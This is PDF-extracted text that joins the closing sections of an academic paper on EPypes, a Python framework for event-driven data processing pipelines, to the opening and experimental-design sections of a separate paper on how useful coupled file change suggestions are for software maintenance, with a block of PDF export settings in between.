by EPypes can be considered negligible. Related work The idea of explicit utilization graph-based representation of data processing algorithms has been on the surface for many years. The availability of engineering tools, data science Figure 14 Components’ durations and network overhead for a series of vision requests. Full-size DOI: 10.7717/peerj-cs.176/fig-14 Figure 15 Computational graph overhead. Full-size DOI: 10.7717/peerj-cs.176/fig-15 Figure 16 EPypes overhead. Full-size DOI: 10.7717/peerj-cs.176/fig-16 Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 16/20 http://dx.doi.org/10.7717/peerj-cs.176/fig-14 http://dx.doi.org/10.7717/peerj-cs.176/fig-15 http://dx.doi.org/10.7717/peerj-cs.176/fig-16 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ frameworks, and modeling formalisms, described in the Background section, shows the efficacy of the pipeline thinking when designing systems with streaming logic. The distinctive approach of EPypes lies in its tight integration with the Python ecosystem, support for algorithm prototyping, and abstractions for integration of the developed computational graphs into distributed systems. The EPypes architecture is a logical continuation of the concept of discrete event data flow, earlier presented by Semeniuta & Falkman (2015). This earlier work attempted to define a data flow formalism with distinct notion of event as the one used in publish/subscribe systems. However, the presented formalism didn’t include a reference implementation at the time. EPypes has, in turn, refined the notion of reactive pipelines and made it usable in real scenarios. Other highly related work within the formal methods domain is Stream Algebra (Helala, Pu & Qureshi, 2014), with its Go-based implementation (Helala, Pu & Qureshi, 2016). This approach models an image processing algorithm as a set of data streams that get altered by a set of operators. In the algebra implementation, a stream corresponds to a Go channel, and the set of defined operators allow to define usable workflow patterns such as pipeline graphs, fork-join graphs, and pipeline graphs with feedback. The latter option is naturally supported due to the concurrency features of Go. This approach, similarly to EPypes, allows to construct high level algorithm from finer functions, including those from the OpenCV library. The distinctive feature is the support for feedback, which is disallowed in EPypes due to the acyclicity requirement. The feedback with EPypes, however, can be realized on a higher systemic level, by incorporating additional distributed components. In the contemporary robotics research, the robot operating system (ROS) is widely used as the underlying platform for the distributed robotic applications relying on data from sensors and cameras. The general architecture in this case is based on a collection of nodes that react to arrival of data through publish/subscribe topics, which makes the overall logic graph-based. The related concept of nodelet (and component in ROS2) allows to realize a processing graph structure as a part of a single operating system process. Examples of this approach is often demonstrated on the applications of point cloud processing (Rusu & Cousins, 2011; Munaro et al., 2013; Carraro, Munaro & Menegatti, 2017), as to minimize latency due to inter-process or remote communication. ROS-based processing graphs, especially in the single-process case, are somewhat similar to EPypes pipelines. They, however, target applications with already developed algorithms, as opposed to EPypes, which supports early-stage prototyping using the graph-based abstractions. Other academic examples of similar robot/vision architectures include the one based on the supervisory control theory of discrete-event systems (Košecka, Christensen & Bajcsy, 1995) and service-oriented dataflow-like components, auto-tuned by higher-level supervisors (Crowley, Hall & Emonet, 2007). CONCLUSIONS AND FURTHER WORK This paper has presented EPypes, an architecture and Python-based software framework for building event-driven data processing pipelines. Because most of vision Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 17/20 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ algorithms and many data processing routines are naturally modeled as pipelines, EPypes offers a capability of implementing data processing systems as DAGs. Apart from the functional components comprising the prototype implementation of EPypes, this paper has presented a system development framework that supports evolution of computational graphs from an early prototyping phase to their deployment as reactive pipelines. The principle of the EPypes abstraction is demonstrated on the example of constructing a computational graph for edge detection and discussing the inner structure of the hierarchy of pipelines. Further, a real scenario of deployment of an EPypes pipeline for features detection and matching to a distributed system is experimentally studied. It was shown that the ability to adapt reactive behavior to various publish/subscribe middleware solutions allows to combine EPypes pipelines with already available systems. The measured timing properties of the image processing component based on EPypes show that the latter introduces negligible overhead comparing to the application-inherent processing time. An important part of further work should be connected with development of software abstractions on the highest level of the system development continuum shown in Fig. 11. This will enable fine-tuning and enhancing of reactive pipelines, for example, with adapters to different messaging systems (e.g., MQTT, RabbitMQ, DDS), parallelizable nodes, and specialized pipeline management logic. An important task in this case is implementation of systematic error handling. A failure inside the pipeline (e.g., in the case of a vision system, due to changed lighting conditions) can be handled by issuing the corresponding event that will be processed by a remote component. In addition to queues providing asynchronous messaging, other communication modalities can be used. An RPC API (such as REST or gRPC) can be established to allow external systems getting meta-information about the running pipeline and changing values of hyperparameters. Last, but not least, functionality for interaction with databases should be integrated. As the presented software framework is implemented in Python, it naturally gears toward system prototyping use cases. The static abstractions are useful for algorithm prototyping, while the transition to the reactive components allow for rapid deployment of the computational graphs to distributed environments. This allows for harnessing the available Python data science tools and integrating them into industrial automation workflow. The limitation of the proposed implementation lies in its non-deterministic overhead due to the use of the interpreted garbage-collected programming language. Hence, applications requiring high rate of operation and more deterministic running time are more likely to be developed in C++ with custom UDP-based communication protocols or real-time middleware such as DDS. It is of interest therefore to validate the principles of EPypes using C++ codebase, as well as to devise a strategy of transforming EPypes-based computational graphs to high-performance computing components, for example, via code generation. Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 18/20 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ ADDITIONAL INFORMATION AND DECLARATIONS Funding This paper was written in association with the MultiMat project and SFI Manufacturing, funded by the Norwegian Research Council. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosure The following grant information was disclosed by the authors: MultiMat project and SFI Manufacturing, funded by the Norwegian Research Council. Competing Interests The authors declare that they have no competing interests. Author Contributions � Oleksandr Semeniuta conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Petter Falkman authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: The source code of the EPypes library is available at GitHub: https://github.com/semeniuta/EPypes. REFERENCES Carraro M, Munaro M, Menegatti E. 2017. A Powerful and Cost-Efficient Human Perception System for Camera Networks and Mobile Robotics. In: Chen W, Hosoda K, Menegatti E, Shimizu M, Wang H, eds. Intelligent Autonomous Systems 14. IAS 2016. Advances in Intelligent Systems and Computing. Vol. 531. Cham: Springer, 485–497. Cassandras C, Lafortune S. 2008. Introduction to discrete event systems. New York: Springer. Crowley JL, Hall D, Emonet R. 2007. Autonomic computer vision systems. In: 2007 International Conference on Computer Vision Systems, ICVS. Vol. 7. Bielefeld: Applied Computer Science Group. Dworak A, Ehm F, Charrue P, Sliwinski W. 2012. The new cern controls middleware. Journal of Physics: Conference Series 396(1):012017 DOI 10.1088/1742-6596/396/1/012017. Helala MA, Pu KQ, Qureshi FZ. 2014. A stream algebra for computer vision pipelines. 2014 IEEE Conference on Computer Vision and Pattern Recognition Workshops, Columbus, OH. Piscataway: IEEE, 800–807 DOI 10.1109/CVPRW.2014.122. Helala M, Pu KQ, Qureshi F. 2016. A formal algebra implementation for distributed image and video stream processing. In: Proceedings 10th International Conference on Distributed Smart Cameras (ICDSC 16). New York: ACM. Hinze A, Sachs K, Buchmann A. 2009. Event-based applications and enabling technologies. In: Proceedings of the Third ACM International Conference on Distributed Event-Based Systems—DEBS ’09. New York: ACM Press, 1. Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 19/20 https://github.com/semeniuta/EPypes http://dx.doi.org/10.1088/1742-6596/396/1/012017 http://dx.doi.org/10.1109/CVPRW.2014.122 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ Košecka J, Christensen HI, Bajcsy R. 1995. Discrete event modeling of visually guided behaviors. International Journal of Computer Vision 14(2):179–191 DOI 10.1007/bf01418982. Lee EA, Seshia SA. 2011. Introduction to embedded systems, a cyber-physical systems approach. Second Edition. Cambridge: MIT Press. Magnoni L. 2015. Modern messaging for distributed sytems. Journal of Physics: Conference Series 608(1):1–8. Munaro M, Basso F, Michieletto S, Pagello E, Menegatti E. 2013. A software architecture for rgb-d people tracking based on ros framework for a mobile robot. In: Frontiers of Intelligent Autonomous Systems.. Vol. 466. Berlin, Heidelberg: Springer, 53–68. Rublee E, Bradski G. 2011. Orb—an efficient alternative to sift or surf. Piscataway: IEEE, 2564–2571. Rusu RB, Cousins S. 2011. 3d is here: point cloud library (PCL). In: Proceedings—IEEE International Conference on Robotics and Automation. Piscataway: IEEE, 1–4. Semeniuta O, Falkman P. 2015. Discrete event dataflow as a formal approach to specification of industrial vision systems. In: 2015 IEEE International Conference on Automation Science and Engineering (CASE), Vol. 2015-October. Piscataway: IEEE, 849–854. Semeniuta O, Falkman P. 2018. Flexible image acquisition service for distributed robotic systems. In: 2018 Second IEEE International Conference on Robotic Computing (IRC). Piscataway: IEEE, 106–112. ZeroMQ. 2008. Broker vs. brokerless. Available at http://zeromq.org/whitepapers:brokerless (accessed 28 February 2018). Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 20/20 http://dx.doi.org/10.1007/bf01418982 http://zeromq.org/whitepapers:brokerless http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ EPypes: a framework for building event-driven data processing pipelines Introduction Background Epypes Conclusions and Further Work References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_6qxc4oe23veqhn7qioxt5srhlu ---- Submitted 16 January 2017 Accepted 18 September 2017 Published 16 October 2017 Corresponding author Jasmin Ramadani, jasmin.ramadani@informatik.uni- stuttgart.de Academic editor Ahmed Hassan Additional Information and Declarations can be found on page 28 DOI 10.7717/peerj-cs.135 Copyright 2017 Ramadani and Wagner Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Are suggestions from coupled file changes useful for perfective maintenance tasks? Jasmin Ramadani and Stefan Wagner Institute of Software Technology, University of Stuttgart, Stuttgart, Germany ABSTRACT Background. Software maintenance is an important activity in the development process where maintenance team members leave and new members join over time. The identification of files which are changed together frequently has been proposed several times. Yet, existing studies about coupled file changes ignore the feedback from developers as well as the impact of these changes on the performance of maintenance and rather these studies rely on the analysis findings and expert evaluation. Methods. We investigate the usefulness of coupled file changes during perfective maintenance tasks when developers are inexperienced in programming or when they were new on the project. Using data mining on software repositories we identify files that are changed most frequently together in the past. We extract coupled file changes from the Git repository of a Java software system and join them with corresponding attributes from the versioning and issue tracking system and the project documentation. We present a controlled experiment involving 36 student participants in which we investigate if coupled file change suggestions influence the correctness of the task solutions and the required time to complete them. Results. The results show that the use of coupled file change suggestions significantly increases the correctness of the solutions. However, there is only a minor effect on the time required to complete the perfective maintenance tasks. We also derived a set of the most useful attributes based on the developers’ feedback. Discussion. Coupled file changes and a limited number of the proposed attributes are useful for inexperienced developers working on perfective maintenance tasks where although the developers using these suggestions solved more tasks, they still need time to understand and organize this information. Subjects Data Science, Software Engineering Keywords Data mining, Software repositories, Coupled changes, Git INTRODUCTION Software maintenance represents a very important part in software product develop- ment (Abran & Nguyenkim, 1991). Maintenance is often performed by maintenance programmers. Over time teams change when members leave and others join (Hutton & Welland, 2007). New members cannot be productively included to solve maintenance tasks immediately, so they need some support to successfully perform their tasks. Perfective maintenance tasks represent changes dealing with new or modified user requirements (Stafford, 2003). They are related to activities which increase performance of How to cite this article Ramadani and Wagner (2017), Are suggestions from coupled file changes useful for perfective maintenance tasks? PeerJ Comput. Sci. 3:e135; DOI 10.7717/peerj-cs.135 https://peerj.com mailto:jasmin.ramadani@informatik.uni-stuttgart.de mailto:jasmin.ramadani@informatik.uni-stuttgart.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.135 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.135 the system or enhance its user interface (Van Vliet, Van Vliet & Van Vliet, 1993). Lientz & Swanson (1980) reported that more than 60% of the software maintenance efforts are of perfective nature. Software development produces large amounts of data which is stored in software repositories. These repositories contain the artifacts developed during software evolution. After some time, this data becomes a valuable information source for solving maintenance tasks. One of the most used techniques for analyzing software repositories is data mining. The term mining software repositories (MSR) describes investigations of software repositories using data mining (Hassan, 2008). Couplings have been defined as ‘‘the measure of the strength of an association established by a connection from one module to another’’ (Stevens, Myers & Constantine, 1974). Change couplings are also described as files having the same commit time, author and modification description (Gall, Jazayeri & Krajewski, 2003). Knowing which files were frequently changed together can support developers in dealing with the large amount of information about the software product, especially if the developer is new on the project, the project started a long time ago or if the developer does not have significant experience in software development. Problem statement Several researchers have proposed approaches of identifying coupled file changes to give recommendations to developers (Bavota et al., 2013; Kagdi, Yusuf & Maletic, 2006; Ying et al., 2004; Zimmermann et al., 2004; Hassan & Holt, 2004). Existing studies, however, focus on the presentation of the mining results and expert investigations and they neglect the feedback of developers on the findings as well as the impact of coupled changes on maintenance tasks. Research objectives The overall aim of our research is to investigate the usefulness of coupled file change suggestions in supporting developers who are inexperienced, new on the projects or supposed to work on unfamiliar parts of the project. We provide suggestions for likely changes so that we can explore how useful the suggestions are for the developers. We identify couplings of files that are changed frequently together based on the information gathered from the software project repository. We use the version control system, the issue tracking system and the project documentation archives as data sources for additional attributes. We join this additional information to the coupled changes that we discover to build the suggestions. The usefulness of coupled file changes is determined by analyzing their influence on the correctness of the solutions and the time required for solving maintenance tasks. Contribution We present a controlled experiment on the usefulness of coupled change suggestions where each of the 36 participants try to solve four different perfective maintenance tasks and report their feedback on the usefulness of the repository attributes. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 2/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 RELATED WORK Many studies have been dedicated to investigating software repositories to find logically coupled changes, e.g., Bieman, Andrews & Yang (2003); Fluri, Gall & Pinzger (2005); Gall, Hajek & Jazayeri (1998). We identify two granularity levels, the first one investigates the couplings based on a file level (Kagdi, Yusuf & Maletic, 2006; Ying et al., 2004) and the second scenario examines coupled changes identified between parts of files like classes, methods or modules (Fluri, Gall & Pinzger, 2005; Kagdi, 2007; Zimmermann et al., 2004; Zimmermann et al., 2006; Hassan & Holt, 2004). In our study, we use coupled file change on a file level. The majority of the studies dealing with identifying coupled changes use some kind of data mining for this purpose (German, 2004; Hattori et al., 2008; Kagdi, Yusuf & Maletic, 2006; Shirabad, Lethbridge & Matwin, 2003; Van Rysselberghe & Demeyer, 2004; Ying et al., 2004; Zimmermann et al., 2004). Especially the association rules technique is often used to identify frequent changes (Kagdi, Yusuf & Maletic, 2006; Ying et al., 2004; Zimmermann et al., 2004). This data mining technique uses various algorithms to determine the frequency of these changes. Most of the studies employ the Apriori algorithm (Kagdi, Yusuf & Maletic, 2006; Zimmermann et al., 2004). However, other faster algorithms like the FP-growth algorithm are also in use (Ying et al., 2004). We generate the coupled file changes using the frequent item sets analysis and the FP-growth algorithm. Most of the studies use a single data source where some kind of version control system is investigated, typically CVS or Subversion. There are few studies which investigate a Git version control system (Bird et al., 2009; Carlsson, 2013). Other studies combine more than one data source to be investigated, like the version control system and an issue tracking system (Canfora & Cerulo, 2005; D’Ambros, Lanza & Robbes, 2009; Fischer, Pinzger & Gall, 2003; Wu et al., 2011) where the data extracted from these two sources is analyzed and the link between the changed files and issues is determined. We use three different sources for the additional attributes: the Git versioning history, the JIRA issue tracking system and the software documentation. To the best of our knowledge, there are few studies investigating how couplings align with developers’ opinion or feedback. Coupling metrics on structural and semantic levels are investigated in Revelle, Gethers & Poshyvanyk (2011). The developers were asked if they find these metrics to be useful. They show that feature couplings on a higher level of abstraction than classes are useful. The developers’ perceptions of software couplings are investigated in Bavota et al. (2013). Here the authors examine how class couplings captured by different coupling measures like semantic, logical and others align with the developers’ perception of couplings. The interestingness of coupled changes is also studied in Ying et al. (2004). This study defines a categorization of coupled changes interestingness according to the source code changes. In Ramadani & Wagner (2016), the feedback on the interestingness of coupled file changes and attributes from the software repository was investigated. In our experiment we extend the findings of this case study and investigate the usefulness of coupled file changes and the corresponding attributes. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 3/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 The categorization of changes of a software product related to the maintenance task categories defined in Swanson (1976) has been previously investigated (Hindle, German & Holt, 2008; Purushothaman & Perry, 2005). The authors in Purushothaman & Perry (2005) classified small changes based on their purpose and implementation. The changes on the software in large commits have been categorized in Hindle, German & Holt (2008). They define categories to identify the types of the addressed issues and the types of the changes in large commits. Similarly, we classify the issues related to the changes on the system based on the defined maintenance categories. Furthermore, we classify the changes on the system based on the most involved functionalities. Various experiments involving maintenance tasks have been described in the literature. Nguyen, Boehm & Danphitsanuphan (2011) deal with assessing and estimating software maintenance tasks. De Lucia, Pompella & Stefanucci (2002) investigate the effort estimation for corrective software maintenance. Ricca et al. (2012) perform an experiment on maintenance in the context of model-driven development. Chan (2008) investigates the impact of programming and application-specific knowledge on maintenance effort. In our experiment, we explore how the coupled file change suggestions influence the correctness of performing maintenance tasks and the time required to solve these tasks. BACKGROUND Software maintenance Software maintenance includes program or documentation changes to make the software system perform correctly or more efficiently (Shelly, Cashman & Rosenblatt, 1998). Software maintenance has been defined in the IEEE 1219 Standard for Software Maintenance (IEEE, 1998) to be a software product modification after delivery to remove faults, improve performance or adapt the environment. In the ISO/IEC 12207 Life Cycle Processes Standard (ISO/IEC, 2008), maintenance is described as the process where code or documentation modifications are performed due to some problem or improvement. Maintenance categories Swanson (1976) defined three different categories of maintenance: corrective, adaptive and perfective maintenance. The ISO/IEC 14764 International Standard for Software Maintenance (ISO/IEC, 2006) updates this list with a fourth category, preventive maintenance, so we have the following maintenance categories (Pigoski, 1996): • Corrective Maintenance: This type of maintenance tasks includes corrections of errors in systems. Software product modifications are performed to correct the discovered problems. It corrects design, source code and implementation errors. • Adaptive Maintenance: This involves changes in the environment and includes adding new features or functions to the system. Software product modifications are performed to ensure software product usability in a changed environment. • Perfective Maintenance: This involves changes in the system which influence its efficiency. It also includes software product modifications to improve maintainability or performance. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 4/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 • Preventive Maintenance: Here, the changes to the system are performed to reduce the possibility of system failures in the future. It includes software product modification to detect and remove failures before they materialize. Data mining Coupled file changes To discover coupled file changes using data mining, we introduce the data technique that we employ in our study. One of the most popular data mining techniques is the discovery of frequent item sets. To identify sets of items which occur together frequently in a given database is one of the most basic tasks in data mining (Han, 2005). Coupled changes describe a situation where someone changes a particular file and also changes another file afterwards. Let us say that the developer changes file f1 and then frequently changes file f3. By investigating the transactions of changed files in the version control system commits we identify a set of files that are changed together. Let us have the following three transactions: T1= { f1,f2,f3,f7 } , T2= { f1,f3,f5,f6 } , T3= { f1,f2,f3,f8 } . From these three transactions, we isolate the rule that files f1 and f3 are found together: f1 and f3 are coupled. This means that when the developers changed file f1, they also changed file f3. If these files are found together frequently, this can help other persons by suggesting that if they change f1, they should also change f3. Let F = { f1,f2,...,fd } be the set of all items (files) f in a transaction and T ={t1,t2,...,tn} be the set of all transactions t. As transactions, we define the commits consisting of different files. Each transaction contains a subset of chosen items from F called item set. An important property of an item set is the support count δ which is the number of transactions containing an item. We call the item sets frequent if they have a support threshold minsup greater than a minimum specified by the user with 0≤minsup≤|F|. (1) Data mining algorithm Various algorithms for mining frequent item sets and association rules have been proposed in literature (Agrawal & Srikant, 1994; Györödi & Györödi, 2004; Han, Pei & Yin, 2000). We use the FP-Tree-Growth algorithm to find the frequent change patterns. As opposed to the Apriori algorithm (Agrawal & Srikant, 1994) which uses a bottom-up generation of frequent item set combinations, the FP-Tree-Growth algorithm uses partition and divide-and-conquer methods (Györödi & Györödi, 2004). This algorithm is faster and more memory-efficient than the Apriori algorithm used in other studies. This algorithm allows frequent item set discovery without candidate item set generation. Change grouping heuristic There are different heuristics proposed for grouping file changes (Kagdi, Yusuf & Maletic, 2006). We apply a heuristic considering the file changes done by a single committer to be related and do not include the changes done by other committers in the same group. We use the complete version history of the project, however based on the ‘‘developer heuristic’’ we group the commits performed by a single developer. From each group of these commits we extract files frequently changed together. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 5/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 EXPERIMENTAL DESIGN In this section we define the research questions, hypotheses and metrics used in our analysis. Study goal We use the GQM approach (Basili, Caldiera & Rombach, 1994) and its MEDEA extension (Briand, Morasca & Basili, 2002) to define the study goal. The goal of our study is to analyze the usefulness of coupled file change suggestions. The objective is to compare the correctness of the solution and the time needed for a set of maintenance tasks between the group using coupled change suggestions and the group that does not use this kind of help. The purpose is to evaluate how effective coupled file change suggestions are regarding the correctness of the modified source code and the time required to perform the maintenance tasks. The viewpoint is that of software developers and the targeted environment is open source systems. Research questions We investigate the usefulness of coupled file change suggestions and the corresponding repository attributes. In this study, we concentrate on perfective maintenance to have a similar set of tasks. For that purpose we define the following research questions: RQ1: How useful are coupled file change suggestions in solving perfective maintenance tasks? To determine the usefulness of the coupled file changes concept, we define the following sub-questions: RQ1.1: Do coupled file change suggestions influence the correctness of perfective maintenance tasks? We investigate if there is any difference in the correctness of the maintenance task solutions between the group of developers who used coupled file change suggestions and the group not using them. RQ1.2: Do coupled file change suggestions influence the time needed to solve perfective maintenance tasks? We explore if the time that the developers need to complete the maintenance tasks differs between the group using coupled change suggestions and the group not using these suggestions. We consider two scenarios: The first one includes only the time needed to solve the tasks, the second one also includes the time needed to select relevant coupled file changes. RQ2: How useful are the attributes from the software repository in solving perfective maintenance tasks? The second research question deals with the attributes from the versioning system, the issue tracking system and the documentation. We investigate the perceived usefulness of each attribute in the proposed set to understand which attributes are good candidates to be provided to the developers. Hypotheses We formulate the following hypotheses to answer the research questions in our study. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 6/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 For RQ1.1 we define the following hypotheses: H0.1.1: There is no significant difference in the correctness of perfective maintenance task solutions between the developers using coupled file change suggestions and those not using these suggestions. HA.1.1: There is a significant difference in the correctness of perfective maintenance task between the developers who used coupled file change suggestions and those not using these suggestions. For RQ1.2 we address the following hypotheses: H0.1.2: There is no significant difference in the time required to solve perfective maintenance tasks between the developers who used coupled file change suggestions and the developers not using these suggestions. HA.1.2: There is a significant difference in the time required to solve perfective maintenance tasks between the developers who used coupled file change suggestions and those not using these suggestions. To answer RQ2 we formulate the following hypotheses: H0.2: There is no significant difference in the perceived usefulness among the attributes from the software repository in the current set. HA.2: There is a significant difference in the perceived usefulness among the attributes from the software repository in the current set. Experiment variables We define the following dependent variables: the correctness of the solution after the execution of the maintenance task, the time spent to perform the maintenance task and the usefulness of the repository attributes. For the first variable, the correctness of the task solution, we assign scores to each developer’s solution of the maintenance tasks. Our approach is similar to the one presented by Ricca et al. (2012) where the correctness of the solution of the maintenance task is manually assessed by defining scores from totally incorrect to completely correct task solution. We define three scores: 0 if the developers did not execute or did not solve the task at all, 1 if the task was partially solved and 2 if the developer performed a complete solution of the maintenance task. The solutions are tested using unit tests to ensure the correctness of the edited source code. The second variable, the time required for executing the maintenance tasks is measured by examining the screen recordings. We mark the start time and the end time for every task. We calculate the difference to compute the total time needed to solve each task. We differentiate the time needed only to solve the tasks ts and the time needed to determine the relatedness of the coupled files tr. For the third variable, the usefulness of the repository attributes, we use an ordinal scale to identify the feedback of the developers. The participants can choose between the following options for each attribute: very useful, somewhat useful, neutral, not particularly useful and not useful. We code the usefulness feedback using the scoring presented in Table 1. Experiment design We distinguish two cases for the maintenance tasks: the first one includes tasks executed on Java Code in the Eclipse IDE without any suggestions and the second one includes tasks Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 7/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 Table 1 Usefulness score. Very useful Somewhat useful Neutral Not particularly useful Not useful 5 4 3 2 1 Table 2 Experiment design. Lab Tasks Lab 1 Tasks 1–2 (−) Tasks 3–4 (+) Lab 2 Tasks 1–2 (+) Tasks 3–4 (−) executed with additional coupled files suggestions and corresponding attributes from the repositories. We use a similar approach to the one presented by Ricca et al. (2012) and define two values: − for Eclipse only and + for the coupled file suggestions. We use a counterbalanced experiment design as described in Table 2. This ensures that all subjects work with both treatments: without and with coupled change suggestions. We split the subjects randomly into two groups working in two lab sessions of two hours each. In each session, the participants work on two tasks using only the task description and on two tasks using coupled file change suggestions and their related attributes. The participants in the second lab swapped the order of the tasks in the first lab. Objects The object of the study is an open source Java software called A-STPA. The source code and the repository were downloaded from SourceForge (https://sourceforge.net/projects/ astpa/). The system was built mainly in Java by 12 developers at the University of Stuttgart during a software project between 2013 and 2014. It represents an Eclipse-based tool for 